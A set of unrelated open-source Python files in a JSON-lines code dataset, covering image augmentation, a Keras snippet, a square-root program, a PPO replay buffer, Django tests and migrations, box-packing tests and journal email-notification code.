\"value\",\n \"mask_value\",\n )\n\n\nclass GridDistortion(DualTransform):\n \"\"\"\n Args:\n num_steps (int): count of grid cells on each side.\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.03, 0.03).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n normalized (bool): if true, distortion will be normalized to do not go outside the image. Default: False\n See for more information: https://github.com/albumentations-team/albumentations/pull/722\n\n Targets:\n image, mask\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n num_steps: int = 5,\n distort_limit: ScaleFloatType = 0.3,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n normalized: bool = False,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(GridDistortion, self).__init__(always_apply, p)\n self.num_steps = num_steps\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.normalized = normalized\n\n def apply(\n self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.grid_distortion(img, self.num_steps, stepsx, stepsy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> np.ndarray:\n return F.grid_distortion(\n img, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n\n def apply_to_bbox(self, bbox: BoxInternalType, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.grid_distortion(\n mask, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def _normalize(self, h, w, xsteps, ysteps):\n # compensate for smaller last steps in source image.\n x_step = w // self.num_steps\n last_x_step = min(w, ((self.num_steps + 1) * x_step)) - (self.num_steps * x_step)\n xsteps[-1] *= last_x_step / x_step\n\n y_step = h // self.num_steps\n last_y_step = min(h, ((self.num_steps + 1) * y_step)) - (self.num_steps * y_step)\n ysteps[-1] *= last_y_step / y_step\n\n # now normalize such that distortion never leaves image bounds.\n tx = w / math.floor(w / self.num_steps)\n ty = h / math.floor(h / self.num_steps)\n xsteps = np.array(xsteps) * (tx / np.sum(xsteps))\n ysteps = np.array(ysteps) * (ty / np.sum(ysteps))\n\n return {\"stepsx\": xsteps, \"stepsy\": ysteps}\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n stepsx = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in range(self.num_steps + 1)]\n stepsy = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in range(self.num_steps + 1)]\n\n if self.normalized:\n return self._normalize(h, w, stepsx, stepsy)\n\n return {\"stepsx\": stepsx, \"stepsy\": stepsy}\n\n def get_transform_init_args_names(self):\n return \"num_steps\", \"distort_limit\", \"interpolation\", \"border_mode\", \"value\", \"mask_value\", \"normalized\"\n","repo_name":"albumentations-team/albumentations","sub_path":"albumentations/augmentations/geometric/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":62848,"program_lang":"python","lang":"en","doc_type":"code","stars":12818,"dataset":"github-code","pt":"16"} +{"seq_id":"9970624977","text":"import tensorflow as tf\r\nimport keras.layers\r\n\r\nn_neurons_h = 178\r\nn_neurons_out = 3\r\nn_epochs = 4500\r\nlearning_rate = 0.7\r\n\r\nmodel = tf.keras.Sequential()\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_out, activation=\"softmax\"))\r\n\r\nmodel.fit(training_data, training_labels, epochs=n_epochs, batch_size=32)\r\n\r\nmodel.compile(optimizer=tf.train.GradientDescentOptimizer(learning_rate=learning_rate), loss=\"binary_crossentropy\",\r\n metrics=[\"accuracy\"])\r\nmodel.fit(training_X, training_y, epochs=n_epochs)\r\n","repo_name":"Yasaman1997/Principles_Of_Datamining","sub_path":"HW3/Part2/Drinks/drinks/tensorflow.py","file_name":"tensorflow.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"10709110775","text":"# squareroot.py\n# This program takes a postiive floating point number as input\n# and outputs an approximation of its square root\n# author: Rachel King\n\ndef sqrt(n) :\n # Assuming the sqrt of n as n only\n x = n\n # To count the number of iterations\n count = 0\n while (1) :\n count += 1\n # Calculate estimate\n root = 0.5 * (x + (n / x))\n # Check for closeness # this is to set how accurate we want the result to be\n if (abs(root - x) < 0.0001) : # it's set to be accurate within 0.0001 \n break\n # Update root\n x = root\n return root\ndef amount(message = \"Please enter a postive number: \"):\n num = False\n while (not num):\n try:\n num = float(input(message))\n except ValueError:\n print(\"That was not a number: \",end=\"\")\n return num\nn = amount()\nanswer = float(sqrt(n))\nanswer_rounded = \"{:.1f}\".format(answer)\nprint(f\"The square root of {n} is approx. {answer_rounded}\")","repo_name":"rachel-king4/pands-problem-sheet","sub_path":"squareroot.py","file_name":"squareroot.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70916798090","text":"import jax\nimport jax.numpy as jnp\nimport dm_env\nimport numpy as np\n\n\nclass FixedReplayBuffer:\n \"\"\"Fixed-size buffer to store transition tuples.\"\"\"\n\n def __init__(self, key_replay_buffer) -> None:\n self.timestep = None\n self.last_value = None\n self._key_replay_buffer = key_replay_buffer\n\n # values_t stores one more step (it also stores last value)\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def __len__(self):\n return len(self.dones_tp1)\n\n def add_first(self, timestep: dm_env.TimeStep) -> None:\n self.timestep = timestep\n\n def add(self, value: float, log_probability: float, action: np.ndarray, next_timestep: dm_env.TimeStep) -> None:\n \"\"\"Add a new transition to memory.\"\"\"\n assert self.timestep is not None, \"Please let the agent observe a first timestep.\"\n\n self.values_t.append(value)\n self.obs_t.append(self.timestep.observation)\n self.actions_t.append(action)\n self.rewards_tp1.append(next_timestep.reward)\n self.dones_tp1.append(next_timestep.last())\n self.logprobs_t.append(log_probability)\n self.timestep = next_timestep\n\n def add_last_value(self, value: float) -> None:\n self.values_t.append(value)\n\n def clear_memory(self):\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def add_advantages(self, advantages):\n self.advantages_t = advantages\n\n def cast_to_numpy(self):\n self.values_t = np.array(self.values_t)\n self.obs_t = np.array(self.obs_t)\n self.actions_t = np.array(self.actions_t)\n self.rewards_tp1 = np.array(self.rewards_tp1)\n self.dones_tp1 = np.array(self.dones_tp1)\n self.logprobs_t = np.array(self.logprobs_t)\n","repo_name":"emasquil/ppo","sub_path":"ppo/replay_buffers/fixed_replay_buffer.py","file_name":"fixed_replay_buffer.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28964575004","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Setting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('class_name', models.CharField(max_length=100, editable=False)),\n ('name', models.CharField(max_length=100, editable=False)),\n ('verbose_name', models.CharField(max_length=100)),\n ('description', models.TextField(null=True, blank=True)),\n ('value', models.TextField(null=True, blank=True)),\n ('last_modified_date', models.DateTimeField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"McHogardty/MedBank","sub_path":"medbank/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37043148034","text":"# Abhinav Bassi\n# CS 100 2014F Section H03\n# TTTP2: Oct 22, 2014\n\n# 1\n\ndef tttDrawMove(t, row, col, mark, edge):\n buffer = (.2*edge)\n newEdge = edge - (2*buffer)\n t.up()\n t.width(1)\n t.goto(0,0)\n if row == 0:\n y = -((3/2)*edge)\n elif row == 1:\n y = -((1/2)*edge)\n elif row == 2:\n y = ((1/2)*edge)\n if col == 0:\n x = 0-edge\n elif col == 1:\n x = 0\n elif col == 2:\n x = 0+edge\n t.goto(x,y)\n if mark =='x' or mark == 'X':\n t.up()\n t.setheading(0)\n t.forward(newEdge/2)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.left(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.forward(newEdge)\n t.right(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.goto(0,0)\n if mark =='o' or mark == 'O':\n t.up()\n t.setheading(0)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.down()\n t.circle(newEdge/2)\n t.up()\n t.setheading(0)\n t.goto(0,0)\n\n# 2\n\ndef drawGrid(t, length, x, y):\n t.width(2)\n beginX = [x, x, x+length, x+(2*length)]\n endX = [x+(3*length), x+(3*length), x+(length), x+(2*length)]\n beginY = [y+(2*length), y+length, y, y]\n endY = [y+(2*length), y+length, y+(3*length), y+(3*length)]\n for i in range(4):\n t.up()\n t.goto(beginX[i],beginY[i])\n t.down()\n t.goto(endX[i],endY[i])\n\nimport turtle\ns = turtle.Screen()\npen = turtle.Turtle()\ndrawGrid(pen,100,-150,-150)\n\nimport math\ntttDrawMove(pen, 0, 0, 'X', 100)\ntttDrawMove(pen, 0, 1, 'X', 100)\ntttDrawMove(pen, 0, 2, 'X', 100)\ntttDrawMove(pen, 1, 0, 'O', 100)\ntttDrawMove(pen, 1, 1, 'O', 100)\ntttDrawMove(pen, 1, 2, 'O', 100)\n","repo_name":"abhibassi/cs100","sub_path":"TTTP2_AbhinavBassi.py","file_name":"TTTP2_AbhinavBassi.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10884447474","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jae'\n\nfrom typing import List\n\nfrom hot100.ListNode import ListNode\n\n\n# https://leetcode.com/problems/merge-k-sorted-lists/\nclass MergeKSortedLists:\n\n # 1.优先队列\n # 依次加入优先级队列,每次都取出最小的\n # heapq\n # Runtime: 108 ms, faster than 70.85% of Python3 online submissions for Merge k Sorted Lists.\n # Memory Usage: 17.6 MB, less than 12.12% of Python3 online submissions for Merge k Sorted Lists.\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if lists is None: return None\n import heapq\n head = []\n headNode = ListNode()\n tempNode = ListNode()\n headNode.next = tempNode\n for i in range(len(lists)):\n if lists[i] is None: continue\n heapq.heappush(head, (lists[i].val, i))\n if head is None: return None\n while head:\n val, index = heapq.heappop(head)\n tempNode.next = ListNode(val)\n tempNode = tempNode.next\n if lists[index]:\n lists[index] = lists[index].next\n if lists[index] is not None:\n heapq.heappush(head, (lists[index].val, index))\n return headNode.next.next\n\n # 2.分治,两个两个处理\n def mergeKLists2(self, lists: List[ListNode]) -> ListNode:\n if not lists: return None\n length = len(lists)\n return self.merge(lists, 0, length - 1)\n\n def merge(self, lists, left, right):\n if right == left:\n return lists[left]\n mid = left + (right - left) // 2\n l1 = self.merge(lists, left, mid)\n l2 = self.merge(lists, mid + 1, right)\n return self.mergeTwoLists(l1, l2)\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if l1 is None:\n return l2\n if l2 is None:\n return l1\n if l1.val <= l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n # 3.对值平铺,排序\n def mergeKLists3(self, lists: List[ListNode]) -> ListNode:\n list1 = []\n for i in lists:\n while i:\n list1.append(i.val)\n i = i.next\n list1.sort()\n prev = ListNode()\n res = prev\n for i in list1:\n node = ListNode(i)\n prev.next = node\n prev = node\n return res.next\n\n\nif __name__ == \"__main__\":\n listNode1 = ListNode(1)\n listNode4 = ListNode(4)\n listNode5 = ListNode(5)\n listNode1.next = listNode4\n listNode4.next = listNode5\n\n listNode12 = ListNode(1)\n listNode3 = ListNode(3)\n listNode42 = ListNode(4)\n listNode12.next = listNode3\n listNode3.next = listNode42\n\n listNode2 = ListNode(2)\n listNode6 = ListNode(6)\n listNode2.next = listNode6\n\n check = MergeKSortedLists()\n check.mergeKLists2([listNode1, listNode12, listNode2]).log()\n","repo_name":"dyjae/LeetCodeLearn","sub_path":"python/hot100/23.MergeKSortedLists.py","file_name":"23.MergeKSortedLists.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11572008969","text":"from http import HTTPStatus\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase, Client\nfrom django.core.cache import cache\n\nfrom ..models import Group, Post\n\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовый пост',\n group=cls.group\n )\n\n def setUp(self):\n cache.clear()\n self.guest_client = Client()\n self.user = User.objects.create_user(username='guest')\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.author_post = Client()\n self.author_post.force_login(self.post.author)\n\n def test_pages_all(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.post.author}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n 'unexisting_page/': HTTPStatus.NOT_FOUND,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_pages_registred(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.user}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n '/unexisting_page/': HTTPStatus.NOT_FOUND,\n '/create/': HTTPStatus.OK,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.authorized_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_edit_page_for_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n with self.subTest(address=edit_post):\n response = self.author_post.get(edit_post)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_edit_page_for_authorized_non_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n response = self.authorized_client.get(edit_post)\n self.assertRedirects(response, f'/posts/{self.post.id}/')\n\n def test_edit_and_create_page_for_guest(self):\n edit_redir = f'/auth/login/?next=/posts/{self.post.id}/edit/'\n url_redir = {\n f'/posts/{self.post.id}/edit/': edit_redir,\n '/create/': '/auth/login/?next=/create/',\n }\n for address, redir in url_redir.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address, follow=True)\n self.assertRedirects(response, redir)\n","repo_name":"vmikail/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42669944870","text":"from fulfillment_api.box_packing.helper import (space_after_packing,\n how_many_items_fit, pre_pack_boxes,\n api_packing_algorithm)\nfrom fulfillment_api.errors import BoxError\n\nfrom collections import Counter\nfrom testing.shotput_tests import BaseShotputTestCase\n\n\nclass HowManyItemsFitTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 1,\n 'remaining_volume': 0\n }, response)\n\n def test_five_fit_extra_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 3,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 5,\n 'remaining_volume': 4\n }, response)\n\n def test_lots_and_lots(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 64,\n 'remaining_volume': 0\n }, response)\n\n def test_max_packed(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info, 8)\n self.assertEqual({\n 'total_packed': 8,\n 'remaining_volume': 56\n }, response)\n\n\nclass SpaceAfterPackingTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 0,\n 'remaining_dimensional_blocks': []\n }, response)\n\n def test_additional_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 2,\n 'width': 2,\n 'length': 2\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 56,\n 'remaining_dimensional_blocks': [\n {'width': 2, 'height': 2, 'length': 2},\n {'width': 2, 'height': 2, 'length': 4},\n {'width': 2, 'height': 4, 'length': 4}]\n }, response)\n\n\nclass PrePackBoxesTest(BaseShotputTestCase):\n\n def test_pre_pack_boxes_simple(self):\n '''\n tests to make sure we can get a pre-pack of boxes with basic non-db info\n '''\n items_info = [{\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'quantity': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams',\n 'product_name': 'TEST_SKU'\n }]\n box_info = {\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {}\n self.assertEqual([{\n 'packed_products': {'TEST_SKU': 1},\n 'total_weight': 2\n }], pre_pack_boxes(box_info, items_info, options))\n\n def test_pre_pack_boxes_too_heavy(self):\n '''\n tests to make sure that when a predefined max weight is provided it\n doesn't over load the boxes\n '''\n items_info = [{\n 'product_name': 'TEST_SKU',\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 3000,\n 'quantity': 4,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }]\n box_info = {\n 'width': 1,\n 'height': 2,\n 'length': 2,\n 'weight': 0,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {\n 'max_weight': 8999\n }\n response = pre_pack_boxes(box_info, items_info, options)\n self.assertEqual([\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n },\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n }\n ], response)\n\n\nLONG_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 8,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x8',\n 'weight': 4\n}\n\nCUBE_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x4',\n 'weight': 4\n}\n\nTOO_SMALL_BOX = {\n 'width': 2,\n 'height': 2,\n 'length': 2,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '2x2x2',\n 'weight': 4\n}\n\nCUBE_SKU = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'product_name': 'TEST',\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'weight': 100\n}\n\n\nclass ApiPackingAlgorithmTest(BaseShotputTestCase):\n\n def setUp(self):\n super(ApiPackingAlgorithmTest, self).setUp()\n self.boxes = {\n '4x4x4': CUBE_BOX,\n '4x4x8': LONG_BOX,\n '2x2x2': TOO_SMALL_BOX\n }\n self.items = {\n '4x4x4': CUBE_SKU\n }\n\n def test_api_packing_algorithm_max_weight(self):\n products = [{\n 'width': 10,\n 'height': 10,\n 'length': 5,\n 'weight': 100,\n 'quantity': 1,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-123'\n }, {\n 'width': 10,\n 'height': 5,\n 'length': 5,\n 'weight': 100,\n 'quantity': 4,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-456'\n }]\n\n result = api_packing_algorithm([{\n 'width': 10,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-1'\n }, {\n 'width': 5,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-2'\n }], products, {\n 'max_weight': 300\n })\n\n expected_counts = Counter()\n for product in products:\n expected_counts[product['product_name']] += product['quantity']\n\n packed_counts = Counter()\n for package in result['packages']:\n self.assertLessEqual(package['total_weight'], 300)\n\n for item_number, quantity in package['packed_products'].iteritems():\n packed_counts[item_number] += quantity\n\n self.assertEqual(expected_counts, packed_counts)\n\n def test_api_packing_algorithm_simple(self):\n boxes_info = [self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_two_boxes(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_last_parcel(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [\n {\n 'packed_products': {'TEST': 2},\n 'total_weight': 204,\n 'box': self.boxes['4x4x8']\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_too_small(self):\n boxes_info = [self.boxes['2x2x2']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Some of your products are too big for your boxes. '\n 'Please provide larger boxes.',\n context.exception.message)\n\n def test_api_packing_max_weight(self):\n boxes_info = [self.boxes['4x4x8'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n options = {'max_weight': 200}\n\n expected_return = {\n 'packages': [\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n packed_products = api_packing_algorithm(boxes_info, items_info, options)\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_non_unique(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Please use unique boxes with unique names',\n context.exception.message)\n","repo_name":"shotput/BoxPackingAPI","sub_path":"test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"} +{"seq_id":"17278865302","text":"__copyright__ = \"Copyright 2017 Birkbeck, University of London\"\n__author__ = \"Martin Paul Eve & Andy Byers\"\n__license__ = \"AGPL v3\"\n__maintainer__ = \"Birkbeck Centre for Technology and Publishing\"\n\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom utils import (\n notify_helpers,\n models as util_models,\n setting_handler,\n render_template,\n)\nfrom core import models as core_models\nfrom review import logic as review_logic\nfrom review.const import EditorialDecisions as ED\n\n\ndef send_reviewer_withdrawl_notice(**kwargs):\n review_assignment = kwargs['review_assignment']\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s review of \"{1}\" has been withdrawn by {2}'.format(review_assignment.reviewer.full_name(),\n review_assignment.article.title,\n request.user.full_name())\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Review Withdrawl',\n 'target': review_assignment.article}\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_withdrawl',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_unassigned_notice(request, message, assignment, skip=False):\n description = \"{a.editor} unassigned from {a.article} by {r.user}\".format(\n a=assignment,\n r=request,\n )\n\n if not skip:\n\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Editor Unassigned',\n 'target': assignment.article\n }\n\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_unassign_editor',\n assignment.editor.email,\n message,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_assigned_acknowledgements_mandatory(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py. It is different to the below function in that this is called when an editor is\n assigned, whereas the below is only called when the user opts to send a message to the editor.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n editor_assignment = kwargs['editor_assignment']\n article = editor_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n acknowledgement = kwargs['acknowledgement']\n\n description = '{0} was assigned as the editor for \"{1}\"'.format(editor_assignment.editor.full_name(),\n article.title)\n\n context = {\n 'article': article,\n 'request': request,\n 'editor_assignment': editor_assignment\n }\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Editor Assignment',\n 'target': article}\n\n # send to assigned editor\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_editor_assignment',\n editor_assignment.editor.email,\n user_message_content,\n log_dict=log_dict\n )\n\n # send to editor\n if not acknowledgement:\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(request, 'editor_assignment',\n 'subject_editor_assignment',\n request.user.email, context,\n log_dict=log_dict)\n\n\ndef send_editor_assigned_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n kwargs['acknowledgement'] = True\n\n send_editor_assigned_acknowledgements_mandatory(**kwargs)\n\n\ndef send_reviewer_requested_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a 